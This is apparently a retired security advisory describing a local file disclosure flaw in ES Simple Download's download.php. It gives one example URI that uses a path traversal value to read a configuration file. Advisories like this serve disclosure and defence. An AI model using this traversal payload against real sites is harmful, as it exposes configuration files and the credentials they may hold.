RETIRED: ES Simple Download 'download.php' Local File Disclosure Vulnerability

RETIRED: ES Simple Download 'download.php' Local File Disclosure Vulnerability

Attackers may exploit this issue through a browser.

The following example URI is available:

http://www.example.com/download.php?file=../../includes/config.inc.php